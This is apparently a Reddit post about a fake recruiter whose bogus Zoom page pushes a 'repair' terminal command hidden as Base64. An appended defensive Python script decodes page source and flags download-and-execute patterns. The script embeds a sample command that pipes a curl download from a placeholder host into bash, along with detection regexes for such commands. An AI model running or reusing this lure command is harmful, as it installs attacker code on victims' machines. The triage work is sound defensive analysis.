Fake recruiter, potential phishing via Zoom?

I got an email from a recruiter, and after a few back-and-forth emails they scheduled a call. There were a few odd details, but I ignored them initially. The email wasn't blatantly odd: no bad spelling, and I was getting replies that seemed normal.

Anyway, they said they'd send the link 15 min. before the interview. I got it, but was sus about the URL, which I plugged into Cloudflare Radar. Screenshot here: https://imgur.com/ATSIuVn

I probably shouldn't have even clicked on the Zoom link, but looking for jobs is a bit of a struggle at the moment. So anyway, I join. It appears someone is in the room, but that there's an issue with audio/video permissions. I can't click on anything else - can't chat, can't leave...so, that was a giveaway.

NORMALLY, I'd click in the URL bar and allow permissions. In this instance, there's a button in the main screen that allows you to click "repair". https://imgur.com/hSvLuFA

I probably should have bailed there tbh, but I clicked it. Anyway, I get a modal that's giving directions to copy/paste a command into a terminal. I am not that naive at least, so I pasted the command elsewhere to get more info.

I also checked the source and saw there was a hidden Base64 curl download. https://imgur.com/hIlSLIG

No idea what it is, but I'm not messing with it. I don't know enough to sandbox it and evaluate safely.

Anyway, I'm probably answering my own question here, but wanted to share.

submitted by /u/hypercosm_dot_net

from hacking: security in practice https://ift.tt/Ak3KSvy
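
Added example, not part of the original post: a static triage of a saved copy of the page source that decodes Base64 runs and flags download-and-execute patterns, so the hidden command can be read without running anything. The sample page, the `atob` layout and the `example.invalid` command are constructed placeholders, and the names `decode_candidates`, `triage` and `INDICATORS` are hypothetical.

```python
import base64
import binascii
import re

# Runs of Base64 alphabet long enough to hide a short shell command.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Patterns typical of "paste this into your terminal" lures.
INDICATORS = {
    "downloader": re.compile(r"\b(curl|wget)\b"),
    "pipe_to_shell": re.compile(r"\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "decode_and_run": re.compile(r"base64\s+(-d|-D|--decode)\b"),
    "url": re.compile(r"https?://[^\s'\"]+"),
}


def decode_candidates(page_source):
    """Yield decoded text for each Base64 run that is valid, readable UTF-8."""
    for match in B64_RUN.finditer(page_source):
        blob = match.group(0)
        blob += "=" * (-len(blob) % 4)  # restore padding stripped by the page
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # ordinary identifier or binary data, not hidden text
        if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            yield text


def triage(page_source):
    """Return decoded strings that look like shell commands, with reasons."""
    findings = []
    for text in decode_candidates(page_source):
        flags = sorted(n for n, rx in INDICATORS.items() if rx.search(text))
        if flags:
            findings.append({"decoded": text, "flags": flags})
    return findings


# Constructed sample: placeholder command and page layout, not the real lure.
SAMPLE_COMMAND = "curl -s https://example.invalid/fix.sh | bash"
SAMPLE_PAGE = (
    '<button id="repair">Repair</button>\n'
    '<script>const cmd = atob("%s");</script>\n'
    % base64.b64encode(SAMPLE_COMMAND.encode()).decode()
)

if __name__ == "__main__":
    for finding in triage(SAMPLE_PAGE):
        print(finding["flags"], "->", finding["decoded"])
```

The script only reads and decodes text; it never fetches the URL or executes the decoded command.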
